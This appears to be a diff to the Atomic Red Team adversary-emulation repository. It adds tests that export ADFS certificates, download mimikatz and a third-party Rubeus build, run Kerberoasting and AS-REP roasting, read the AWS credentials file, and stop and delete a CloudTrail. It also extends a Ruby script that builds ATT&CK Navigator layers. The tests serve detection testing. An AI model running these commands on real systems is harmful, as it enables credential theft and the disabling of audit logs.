+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("displayName") | Out-Null
+      $aduser = $ADSearch.FindOne()
+      $keyObjectGuid = $ADUser.Properties["displayName"] 
+      $ADSearch.PropertiesToLoad.Clear()
+      $ADSearch.PropertiesToLoad.Add("thumbnailphoto") | Out-Null
+      $ADSearch.Filter="(l=$keyObjectGuid)"
+      $aduser=$ADSearch.FindOne() 
+      $key=[byte[]]$aduser.Properties["thumbnailphoto"][0] 
+      # Get encrypted certificates from configuration and decrypt them
+      Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $key
+      Get-ChildItem | Where-Object {$_ -like "ADFS*"}
+      Write-Host "`nCertificates retrieved successfully"
+    cleanup_command: |
+      Remove-Item -Path ".\ADFS_encryption.pfx"
+      Remove-Item -Path ".\ADFS_signing.pfx"
+    name: powershell
+
+

atomics/T1558.001/T1558.001.md

@@ -107,7 +107,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1558.001/T1558.001.yaml

@@ -39,7 +39,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

atomics/T1558.003/T1558.003.md

@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #1 - Request for service tickets](#atomic-test-1---request-for-service-tickets)
 
+- [Atomic Test #2 - Rubeus kerberoast](#atomic-test-2---rubeus-kerberoast)
+
 
 <br/>
 
@@ -61,4 +63,67 @@ Write-Host Joining this computer to a domain must be done manually
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Rubeus kerberoast
+Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 14625569-6def-4497-99ac-8e7817105b55
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| out_file | file where command results are stored | String | rubeus_output.txt|
+| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+| flags | command flags you would like to run (optional and blank by default) | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+
 <br/>

atomics/T1558.003/T1558.003.yaml

@@ -26,3 +26,52 @@ atomic_tests:
       Invoke-Kerberoast | fl
     name: powershell
 
+- name: Rubeus kerberoast
+  auto_generated_guid: 14625569-6def-4497-99ac-8e7817105b55
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+    flags:
+      description: command flags you would like to run (optional and blank by default)
+      type: String
+      default: 
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false

atomics/T1558.004/T1558.004.md

@@ -0,0 +1,79 @@
+# T1558.004 - AS-REP Roasting
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1558/004)
+<blockquote>Adversaries may reveal credentials of accounts that have disabled Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002) Kerberos messages.(Citation: Harmj0y Roasting AS-REPs Jan 2017) 
+
+Preauthentication offers protection against offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002). When enabled, a user requesting access to a resource initiates communication with the Domain Controller (DC) by sending an Authentication Server Request (AS-REQ) message with a timestamp that is encrypted with the hash of their password. If and only if the DC is able to successfully decrypt the timestamp with the hash of the user’s password, it will then send an Authentication Server Response (AS-REP) message that contains the Ticket Granting Ticket (TGT) to the user. Part of the AS-REP message is signed with the user’s password.(Citation: Microsoft Kerberos Preauth 2014)
+
+For each account found without preauthentication, an adversary may send an AS-REQ message without the encrypted timestamp and receive an AS-REP message with TGT data which may be encrypted with an insecure algorithm such as RC4. The recovered encrypted data may be vulnerable to offline [Password Cracking](https://attack.mitre.org/techniques/T1110/002) attacks similarly to [Kerberoasting](https://attack.mitre.org/techniques/T1558/003) and expose plaintext credentials. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019) 
+
+An account registered to a domain, with or without special privileges, can be abused to list all domain accounts that have preauthentication disabled by utilizing Windows tools like [PowerShell](https://attack.mitre.org/techniques/T1059/001) with an LDAP filter. Alternatively, the adversary may send an AS-REQ message for each user. If the DC responds without errors, the account does not require preauthentication and the AS-REP message will already contain the encrypted data. (Citation: Harmj0y Roasting AS-REPs Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)
+
+Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
+
+
+<br/>
+
+## Atomic Test #1 - Rubeus asreproast
+Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 615bd568-2859-41b5-9aed-61f6a88e48dd
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| local_folder | Local path of Rubeus executable | Path | $Env:temp|
+| local_executable | name of the rubeus executable | String | rubeus.exe|
+| out_file | file where command results are stored | String | rubeus_output.txt|
+| rubeus_url | URL of Rubeus executable | url | https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Computer must be domain joined
+##### Check Prereq Commands:
+```powershell
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host Joining this computer to a domain must be done manually
+```
+##### Description: Rubeus must exist
+##### Check Prereq Commands:
+```powershell
+if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+```
+
+
+
+
+<br/>

atomics/T1558.004/T1558.004.yaml

@@ -0,0 +1,49 @@
+attack_technique: T1558.004
+display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
+atomic_tests:
+- name: Rubeus asreproast
+  auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
+  description: |
+    Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
+    This build targets .NET 4.5.  If targeting a different version you will need to compile Rubeus
+  supported_platforms:
+  - windows
+  input_arguments:
+    local_folder:
+      description: Local path of Rubeus executable
+      type: Path
+      default: $Env:temp
+    local_executable:
+      description: name of the rubeus executable
+      type: String
+      default: 'rubeus.exe'
+    out_file:
+      description: file where command results are stored
+      type: String
+      default: rubeus_output.txt
+    rubeus_url:
+      description: URL of Rubeus executable
+      type: url
+      default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Computer must be domain joined
+    prereq_command: |
+      if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host Joining this computer to a domain must be done manually
+  - description: |
+      Rubeus must exist
+    prereq_command: |
+      if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
+  executor:
+    command: |
+      cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
+    cleanup_command: |
+      Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
+    name: powershell
+    elevation_required: false
+  

atomics/T1562.008/T1562.008.md

@@ -0,0 +1,67 @@
+# T1562.008 - Disable Cloud Logs
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1562/008)
+<blockquote>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
+
+Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes)
+
+
+<br/>
+
+## Atomic Test #1 - AWS CloudTrail Changes
+Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudtrail_name | Name of the cloudTrail | String | redatomictesttrail|
+| s3_bucket_name | Name of the bucket | String | redatomic-test|
+| region | Name of the region | String | us-east-1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+```
+
+#### Cleanup Commands:
+```sh
+aws s3 rb s3://#{s3_bucket_name} --force
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
+aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+```
+##### Get Prereq Commands:
+```sh
+echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+```
+
+
+
+
+<br/>

atomics/T1562.008/T1562.008.yaml

@@ -0,0 +1,41 @@
+attack_technique: T1562.008
+display_name: 'Impair Defenses: Disable Cloud Logs'
+atomic_tests:
+- name: AWS CloudTrail Changes
+  auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+  description: |
+    Creates a new cloudTrail in AWS, Upon successful creation it will Update,Stop and Delete the cloudTrail
+  supported_platforms:
+  - iaas:aws
+  input_arguments:
+    cloudtrail_name:
+      description: Name of the cloudTrail
+      type: String
+      default: "redatomictesttrail"
+    s3_bucket_name:
+      description: Name of the bucket
+      type: String
+      default: "redatomic-test"
+    region:
+      description: Name of the region
+      type: String
+      default: "us-east-1"
+  dependencies:
+    - description: |
+        Check if ~/.aws/credentials file has a default stanza is configured
+      prereq_command: |
+        cat ~/.aws/credentials | grep "default"
+        aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
+        aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
+      get_prereq_command: |
+        echo Please install the aws-cli and configure your AWS defult profile using: aws configure
+  executor:
+    command: |
+       aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region #{region}
+       aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name}  --is-multi-region-trail --region #{region}
+       aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
+       aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+    cleanup_command: |   
+       aws s3 rb s3://#{s3_bucket_name} --force 
+    name: sh
+    elevation_required: false

atomics/T1562.008/src/policy.json

@@ -0,0 +1,28 @@
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Sid": "AWSCloudTrailAclCheck20150319",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:GetBucketAcl",
+            "Resource": "arn:aws:s3:::redatomic-test"
+        },
+        {
+            "Sid": "AWSCloudTrailWrite20150319",
+            "Effect": "Allow",
+            "Principal": {
+                "Service": "cloudtrail.amazonaws.com"
+            },
+            "Action": "s3:PutObject",
+            "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
+            "Condition": {
+                "StringEquals": {
+                    "s3:x-amz-acl": "bucket-owner-full-control"
+                }
+            }
+        }
+    ]
+}

atomics/used_guids.txt

@@ -762,3 +762,13 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4
 eeb9751a-d598-42d3-b11c-c122d9c3f6c7
 9d77fed7-05f8-476e-a81b-8ff0472c64d0
 aa6cb8c4-b582-4f8e-b677-37733914abda
+9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
+615bd568-2859-41b5-9aed-61f6a88e48dd
+78e95057-d429-4e66-8f82-0f060c1ac96f
+cab413d8-9e4a-4b8d-9b84-c985bd73a442
+14625569-6def-4497-99ac-8e7817105b55
+e9313014-985a-48ef-80d9-cde604ffc187
+0e59d59d-3265-4d35-bebd-bf5c1ec40db5
+7f85a946-a0ea-48aa-b6ac-8ff539278258
+81d7d2ad-d644-4b6a-bea7-28ffe43becca
+a668edb9-334e-48eb-8c2e-5413a40867af

bin/generate-atomic-docs.rb

@@ -52,7 +52,16 @@ class AtomicRedTeamDocs
     generate_navigator_layer! "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json", \
       "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json", \
-      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json"
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-saas.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json", \
+      "#{File.dirname(File.dirname(__FILE__))}/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json"
 
     return oks, fails
   end
@@ -181,7 +190,7 @@ class AtomicRedTeamDocs
 
   def get_layer(techniques, layer_name)
     layer = {
-      "version" => "4.1",
+      "version" => "4.2",
       "name" => layer_name,
       "description" => layer_name + " MITRE ATT&CK Navigator Layer",
       "domain" => "mitre-enterprise",
@@ -200,12 +209,23 @@ class AtomicRedTeamDocs
   #
   # Generates a MITRE ATT&CK Navigator Layer based on contributed techniques
   #
-  def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin)
+  def generate_navigator_layer!(output_layer_path, output_layer_path_win, output_layer_path_mac, output_layer_path_lin, output_layer_path_iaas, \
+    output_layer_path_iaas_aws, output_layer_path_iaas_azure, output_layer_path_iaas_gcp, output_layer_path_containers, output_layer_path_saas, \
+    output_layer_path_google_workspace, output_layer_path_azure_ad, output_layer_path_office_365)
 
     techniques = []
     techniques_win = []
     techniques_mac = []
     techniques_lin = []
+    techniques_iaas = []
+    techniques_iaas_aws = []
+    techniques_iaas_azure = []
+    techniques_iaas_gcp = []
+    techniques_containers = []
+    techniques_saas = []
+    techniques_google_workspace = []
+    techniques_azure_ad = []
+    techniques_office_365 = []
 
     ATOMIC_RED_TEAM.atomic_tests.each do |atomic_yaml|
       begin
@@ -227,10 +247,28 @@ class AtomicRedTeamDocs
         has_windows_tests = false
         has_macos_tests = false
         has_linux_tests = false
+        has_iaas_tests = false
+        has_iaas_aws_tests = false
+        has_iaas_azure_tests = false
+        has_iaas_gcp_tests = false
+        has_containers_tests = false
+        has_saas_tests = false
+        has_google_workspace_tests = false
+        has_azure_ad_tests = false
+        has_office_365_tests = false
+
         atomic_yaml['atomic_tests'].each do |atomic|
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /windows/} then has_windows_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /macos/} then has_macos_tests = true end
           if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^(?!windows|macos).*$/} then has_linux_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas/} then has_iaas_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:aws/} then has_iaas_aws_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:azure/} then has_iaas_azure_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^iaas:gcp/} then has_iaas_gcp_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^containers/} then has_containers_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^google-workspace/} then has_google_workspace_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^azure-ad/} then has_azure_ad_tests = true end
+          if atomic['supported_platforms'].any? {|platform| platform.downcase =~ /^office-365/} then has_office_365_tests = true end
         end
         if has_windows_tests then
           techniques_win.push(technique)
@@ -244,6 +282,34 @@ class AtomicRedTeamDocs
           techniques_lin.push(technique)
           techniques_lin.push(techniqueParent) unless techniques_lin.include?(techniqueParent)
         end
+        if has_iaas_tests then
+          techniques_iaas.push(technique)
+          techniques_iaas.push(techniqueParent) unless techniques_iaas.include?(techniqueParent)
+        end
+        if has_iaas_azure_tests then
+          techniques_iaas_azure.push(technique)
+          techniques_iaas_azure.push(techniqueParent) unless techniques_iaas_azure.include?(techniqueParent)
+        end
+        if has_iaas_gcp_tests then
+          techniques_iaas_gcp.push(technique)
+          techniques_iaas_gcp.push(techniqueParent) unless techniques_iaas_gcp.include?(techniqueParent)
+        end
+        if has_containers_tests then
+          techniques_containers.push(technique)
+          techniques_containers.push(techniqueParent) unless techniques_containers.include?(techniqueParent)
+        end
+        if has_google_workspace_tests then
+          techniques_google_workspace.push(technique)
+          techniques_google_workspace.push(techniqueParent) unless techniques_google_workspace.include?(techniqueParent)
+        end
+        if has_azure_ad_tests then
+          techniques_azure_ad.push(technique)
+          techniques_azure_ad.push(techniqueParent) unless techniques_azure_ad.include?(techniqueParent)
+        end
+        if has_office_365_tests then
+          techniques_office_365.push(technique)
+          techniques_office_365.push(techniqueParent) unless techniques_office_365.include?(techniqueParent)
+        end
       end
     end
 
@@ -251,16 +317,41 @@ class AtomicRedTeamDocs
     layer_win = get_layer techniques_win, "Atomic Red Team (Windows)"
     layer_mac = get_layer techniques_mac, "Atomic Red Team (macOS)"
     layer_lin = get_layer techniques_lin, "Atomic Red Team (Linux)"
+    layer_iaas = get_layer techniques_iaas, "Atomic Red Team (Iaas)"
+    layer_iaas_aws = get_layer techniques_iaas_aws, "Atomic Red Team (Iaas:AWS)"
+    layer_iaas_azure = get_layer techniques_iaas_azure, "Atomic Red Team (Iaas:Azure)"
+    layer_iaas_gcp = get_layer techniques_iaas_gcp, "Atomic Red Team (Iaas:GCP)"
+    layer_containers = get_layer techniques_containers, "Atomic Red Team (Containers)"
+    layer_google_workspace = get_layer techniques_google_workspace, "Atomic Red Team (Google-Workspace)"
+    layer_azure_ad = get_layer techniques_azure_ad, "Atomic Red Team (Azure-AD)"
+    layer_office_365 = get_layer techniques_office_365, "Atomic Red Team (Office-365)"
+
 
     File.write output_layer_path,layer.to_json
     File.write output_layer_path_win,layer_win.to_json
     File.write output_layer_path_mac,layer_mac.to_json
     File.write output_layer_path_lin,layer_lin.to_json
+    File.write output_layer_path_iaas,layer_iaas.to_json
+    File.write output_layer_path_iaas_aws,layer_iaas_aws.to_json
+    File.write output_layer_path_iaas_azure,layer_iaas_azure.to_json
+    File.write output_layer_path_iaas_gcp,layer_iaas_gcp.to_json
+    File.write output_layer_path_containers,layer_containers.to_json
+    File.write output_layer_path_google_workspace,layer_google_workspace.to_json
+    File.write output_layer_path_azure_ad,layer_azure_ad.to_json
+    File.write output_layer_path_office_365,layer_office_365.to_json
 
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_win}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_mac}"
     puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_lin}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_aws}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_azure}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_iaas_gcp}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_containers}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_google_workspace}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_azure_ad}"
+    puts "Generated Atomic Red Team ATT&CK Navigator Layers at #{output_layer_path_office_365}"
   end
 end